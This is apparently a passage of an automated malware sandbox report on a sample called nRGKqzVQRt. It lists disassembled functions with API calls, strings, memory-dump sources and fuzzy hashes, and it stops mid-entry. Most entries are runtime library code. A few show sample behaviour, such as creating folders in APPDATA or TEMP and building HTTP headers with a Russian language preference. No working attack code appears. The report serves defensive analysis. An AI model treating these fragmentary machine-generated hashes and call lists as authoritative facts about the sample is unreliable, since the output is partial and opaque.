                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                                  • _free.LIBCMT ref: 1000A03A
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000A05C
                                                  • _free.LIBCMT ref: 1000A071
                                                  • _free.LIBCMT ref: 1000A07C
                                                  • _free.LIBCMT ref: 1000A09E
                                                  • _free.LIBCMT ref: 1000A0B1
                                                  • _free.LIBCMT ref: 1000A0BF
                                                  • _free.LIBCMT ref: 1000A0CA
                                                  • _free.LIBCMT ref: 1000A102
                                                  • _free.LIBCMT ref: 1000A109
                                                  • _free.LIBCMT ref: 1000A126
                                                  • _free.LIBCMT ref: 1000A13E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                  • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                                  • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                  • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                                  Function 0041FC43 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: tqC$xqC
                                                  • API String ID: 269201875-4129656487
                                                  • Opcode ID: 2969aaa2978dc56173ce01a97654427f734e5100fbadfe9224481d52d9be4033
                                                  • Instruction ID: 95aa523987b70945ec47ef040bb827334fc69fac3d8989bbbac4bd7d1d483335
                                                  • Opcode Fuzzy Hash: 2969aaa2978dc56173ce01a97654427f734e5100fbadfe9224481d52d9be4033
                                                  • Instruction Fuzzy Hash: E261E5729003059FDB20DF65D841BEBB7E9EF44310F10456FE946EB281EB74AC868B99
                                                  Function 0067FEAA Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: tqC$xqC
                                                  • API String ID: 269201875-4129656487
                                                  • Opcode ID: 483479b85544f4c0e5bc80b966f2d9849d8ebacf4ab7436aef7b396eceb881cd
                                                  • Instruction ID: 85b0a1ed9111d11af8d65363d51a460db803eaa873c0ec5191369c4fd4ee16a4
                                                  • Opcode Fuzzy Hash: 483479b85544f4c0e5bc80b966f2d9849d8ebacf4ab7436aef7b396eceb881cd
                                                  • Instruction Fuzzy Hash: FA613A729003059FEB61EF64C841BABB7F6AF44710F14852DE659EB351EB709D04CB54
                                                  Function 00410052 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0041014F
                                                  • type_info::operator==.LIBVCRUNTIME ref: 00410171
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 00410280
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 00410352
                                                  • _UnwindNestedFrames.LIBCMT ref: 004103D6
                                                  • CallUnexpected.LIBVCRUNTIME ref: 004103F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2123188842-393685449
                                                  • Opcode ID: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                  • Instruction ID: 33ac5f0cf36f84a5a8fc87a3d768383b9666724fdb179a46715a8f318e12c727
                                                  • Opcode Fuzzy Hash: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                  • Instruction Fuzzy Hash: 75B19A71800209EFCF24DFA5C9819EFBBB5BF18314B14406BE8106B252D7B9DAD1CB99
                                                  Function 006702B9 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 006703B6
                                                  • type_info::operator==.LIBVCRUNTIME ref: 006703D8
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 006704E7
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 006705B9
                                                  • _UnwindNestedFrames.LIBCMT ref: 0067063D
                                                  • CallUnexpected.LIBVCRUNTIME ref: 00670658
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2123188842-393685449
                                                  • Opcode ID: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                  • Instruction ID: 14477b5f4d4ad050c841c2de1cc7b1e932485e189027bdecbbde654d34999529
                                                  • Opcode Fuzzy Hash: 8657f2603f6ff61bf91d2f06fc9046fa7427a52db11a4083c066bc076f4ca89f
                                                  • Instruction Fuzzy Hash: 8AB17D71800209EFEF15DFA4C9419EEBBB6BF04310B14815AE8196B356D731EE51CFA5
                                                  Function 10001CDD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 10001CE7
                                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,00000264,1000202E,?), ref: 10001D2D
                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000), ref: 10001DE9
                                                  • GetLastError.KERNEL32(?,?,00000001,00000000), ref: 10001DF9
                                                  • GetTempPathA.KERNEL32(00000104,?,?,?,00000001,00000000), ref: 10001E12
                                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ECC
                                                  • GetLastError.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 10001ED2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLastPath$FolderH_prolog3_Temp
                                                  • String ID: APPDATA$TMPDIR
                                                  • API String ID: 1838500112-4048745339
                                                  • Opcode ID: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                  • Instruction ID: 65cc4f0b8c34a884811309b14049f09b1d2f67be4c4777eb46c939f585e6cab7
                                                  • Opcode Fuzzy Hash: 00851e4ded4e5e03db144df6c0333d2f877147d47fd9b3b0a9c51e3763c74205
                                                  • Instruction Fuzzy Hash: 6B515E70900259EAFB64EBA4CC89BDDB7B9EF04380F5005E9E109A6055DB74AFC4CF61
                                                  Function 100010C7 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 55networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 100010CE
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001103
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001123
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001143
                                                  • HttpAddRequestHeadersA.WININET(?,?,?,20000000), ref: 10001163
                                                  Strings
                                                  • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 100010D9
                                                  • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001145
                                                  • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 10001125
                                                  • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 10001105
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: HeadersHttpRequest$H_prolog3_
                                                  • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                  • API String ID: 1254599795-787135837
                                                  • Opcode ID: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                  • Instruction ID: 505ec4d7c45309835e960384523a5e30396a54de81b8e769e2ad7823f420ed9d
                                                  • Opcode Fuzzy Hash: 8d3d7825b2bb6dea36e27622bcd4b7ddfc44603214986a735072bca3a8471053
                                                  • Instruction Fuzzy Hash: DA119372D0010DEEEB10DBA9DC91DEEBB78EB18351FA0C019F22176051DB75AA45DBB1
                                                  Function 00418D0B Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00418D21
                                                    • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                    • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                  • _free.LIBCMT ref: 00418D2D
                                                  • _free.LIBCMT ref: 00418D38
                                                  • _free.LIBCMT ref: 00418D43
                                                  • _free.LIBCMT ref: 00418D4E
                                                  • _free.LIBCMT ref: 00418D59
                                                  • _free.LIBCMT ref: 00418D64
                                                  • _free.LIBCMT ref: 00418D6F
                                                  • _free.LIBCMT ref: 00418D7A
                                                  • _free.LIBCMT ref: 00418D88
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 24980b58e591c56d90b73563928cc0ea88e749077af59d9f244bab521c2e98c8
                                                  • Instruction ID: ca178761576a792413d1c748b4aedad8a99fe24d8e3ecdc468f759f73ec23368
                                                  • Opcode Fuzzy Hash: 24980b58e591c56d90b73563928cc0ea88e749077af59d9f244bab521c2e98c8
                                                  • Instruction Fuzzy Hash: E121DA76A00109BFCB01EF95C891DDE7BB9FF08344F4081AAF515AB121DB35EA84CB95
                                                  Function 10006D58 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                  • Instruction ID: b25e74a844c2162c16b878e0af7aba0ae7dfb07406db983acad16b8670962f51
                                                  • Opcode Fuzzy Hash: 8b6844ad3729e3fcad320fbe5a6c795a3d07021f3fe8183e596603b455261e22
                                                  • Instruction Fuzzy Hash: B121EB7AA00108AFDB01DF94CC81CDD7BB9FF48290F4041A6F509AB265DB35EB45CB91
                                                  Function 00678F72 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00678F88
                                                    • Part of subcall function 0067994F: HeapFree.KERNEL32(00000000,00000000,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?), ref: 00679965
                                                    • Part of subcall function 0067994F: GetLastError.KERNEL32(?,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?,?), ref: 00679977
                                                  • _free.LIBCMT ref: 00678F94
                                                  • _free.LIBCMT ref: 00678F9F
                                                  • _free.LIBCMT ref: 00678FAA
                                                  • _free.LIBCMT ref: 00678FB5
                                                  • _free.LIBCMT ref: 00678FC0
                                                  • _free.LIBCMT ref: 00678FCB
                                                  • _free.LIBCMT ref: 00678FD6
                                                  • _free.LIBCMT ref: 00678FE1
                                                  • _free.LIBCMT ref: 00678FEF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 8d7bb259e3ad232047728b53ffbe833894350ebe0894f4408949361a6be39974
                                                  • Instruction ID: 2db9758bc7578274ac2eaf52150c2e59e9553182313e4e292024449137135290
                                                  • Opcode Fuzzy Hash: 8d7bb259e3ad232047728b53ffbe833894350ebe0894f4408949361a6be39974
                                                  • Instruction Fuzzy Hash: AD219A76904109AFDB42EF94C882DDE7BBAFF08350F04816AF6599B121EB31DA44CF94
                                                  Function 00424EF6 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,004259BF), ref: 00424F0F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-3064271455
                                                  • Opcode ID: 949264a806388de4bf27def4d2db10dab23ff286707f966d8e08e15c152c9676
                                                  • Instruction ID: 77fc340e961970fd7467041676d8cf64c1629d7790bb492f2f63bf2a057de4fd
                                                  • Opcode Fuzzy Hash: 949264a806388de4bf27def4d2db10dab23ff286707f966d8e08e15c152c9676
                                                  • Instruction Fuzzy Hash: 7E518F70B0092ACBCF108F98FD481AEBBB4FF85304F918087D491A6254CB7D8966CB9D
                                                  Function 10004131 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • type_info::operator==.LIBVCRUNTIME ref: 10004250
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 1000435E
                                                  • _UnwindNestedFrames.LIBCMT ref: 100044B0
                                                  • CallUnexpected.LIBVCRUNTIME ref: 100044CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2751267872-393685449
                                                  • Opcode ID: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                  • Instruction ID: 3d3d7b973083d5502e03e9704e538657a8ad6664bd6ca03923258a49de60437f
                                                  • Opcode Fuzzy Hash: c4421cf047d38b61ed069ce13853ee51e8b724bc32a0b317f19ee854d316b146
                                                  • Instruction Fuzzy Hash: C0B180B5C00209DFEF05DF94D881A9EBBB9FF04390F12415AF8116B21ADB31EA51CB99
                                                  Function 0040ABE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040AC16
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040AC39
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040AC59
                                                  • std::_Facet_Register.LIBCPMT ref: 0040ACBB
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040ACD3
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0040ACF6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                  • String ID: 0vv
                                                  • API String ID: 2081738530-455685883
                                                  • Opcode ID: 5c293808727baf58d0b78994ee596959b051c80a5145d9f106c0e32942314797
                                                  • Instruction ID: 42dd855bafadb820b2dbd196d0a58e7811000d19e1cacf42681462b4bf6c3cd6
                                                  • Opcode Fuzzy Hash: 5c293808727baf58d0b78994ee596959b051c80a5145d9f106c0e32942314797
                                                  • Instruction Fuzzy Hash: C7319FB1908219DFDB21DF54D980A6EB7B4FB04724F15423EE845773D1DB38A902CB8A
                                                  Function 0066AE47 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066AE7D
                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0066AEA0
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0066AEC0
                                                  • std::_Facet_Register.LIBCPMT ref: 0066AF22
                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0066AF3A
                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0066AF5D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                  • String ID: 0vv
                                                  • API String ID: 2081738530-455685883
                                                  • Opcode ID: b885fbd9e08969445e8408afee0ad8d4617e431a29e76d4496445ec0c5d9d7bf
                                                  • Instruction ID: 05fac5cda9a666d82b836848b060e80483da825ee5397ee343ff8c322235300e
                                                  • Opcode Fuzzy Hash: b885fbd9e08969445e8408afee0ad8d4617e431a29e76d4496445ec0c5d9d7bf
                                                  • Instruction Fuzzy Hash: 2831ADB19046599FCB21DF94D880AAEB7B2FB44320F10416DE896B7381DB35AD01CBD6
                                                  Function 10008F36 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$___from_strstr_to_strchr
                                                  • String ID:
                                                  • API String ID: 3409252457-0
                                                  • Opcode ID: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                  • Instruction ID: d9dcc3e5fe16bdce254290b2b7dc8605e647b21a7cac7c74f5ab9bfc5a2656b0
                                                  • Opcode Fuzzy Hash: 95010d729c9058774f15a7cf8f5dacf6367eb285395d52ca300c8e26b156bdd9
                                                  • Instruction Fuzzy Hash: 83510474E04246EFFB10DFB48C85A9E7BE4EF413D0F124169E95497289EB769A00CB51
                                                  Function 0040CB99 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0040CBE2
                                                  • __alloca_probe_16.LIBCMT ref: 0040CC0E
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0040CC4D
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040CC6A
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040CCA9
                                                  • __alloca_probe_16.LIBCMT ref: 0040CCC6
                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040CD08
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040CD2B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                  • String ID:
                                                  • API String ID: 2040435927-0
                                                  • Opcode ID: 4226c0a309d17539fe735c567b77fc588b25ab9f355964044341ac6f8b5074c7
                                                  • Instruction ID: 0eef22ec5c0ed95795941b36f16f6703666d7858d80347e3b12d355d98e8a1b2
                                                  • Opcode Fuzzy Hash: 4226c0a309d17539fe735c567b77fc588b25ab9f355964044341ac6f8b5074c7
                                                  • Instruction Fuzzy Hash: 7851B07260020AEBEB205F65CC85FAB3BB9EF44754F15463AF914B6290DB789C05CB98
                                                  Function 0066D28B Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(004383D4,00000FA0,?,?,0066D269), ref: 0066D297
                                                  • GetModuleHandleW.KERNEL32(00429060,?,?,0066D269), ref: 0066D2A2
                                                  • GetModuleHandleW.KERNEL32(004290A4,?,?,0066D269), ref: 0066D2B3
                                                  • GetProcAddress.KERNEL32(00000000,004290C0), ref: 0066D2C5
                                                  • GetProcAddress.KERNEL32(00000000,004290DC), ref: 0066D2D3
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0066D269), ref: 0066D2F6
                                                  • RtlDeleteCriticalSection.NTDLL(004383D4), ref: 0066D312
                                                  • CloseHandle.KERNEL32(004383D0,?,?,0066D269), ref: 0066D322
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID:
                                                  • API String ID: 2565136772-0
                                                  • Opcode ID: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                  • Instruction ID: 51aac6cee7c3164b87195e92fb5d8dbdec0a7444f7d4cdefc83c040c08fe93c5
                                                  • Opcode Fuzzy Hash: b726dbf4f5b8d2158f5e32706ecf7d801b2e9ac09e7f6c89845f8a688fa70d75
                                                  • Instruction Fuzzy Hash: 03017531B427219BDB311B74BC19BAF7A9D9B44F41B55403AFE04E2390DFB5C8068AAD
                                                  Function 00678423 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 255COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0067908A: GetLastError.KERNEL32(006620FF,?,00662103,006716D8,?,006620FF,004280A0,?,0067933A,00000000,004280A0,00000000,00000000,006620FF), ref: 0067908F
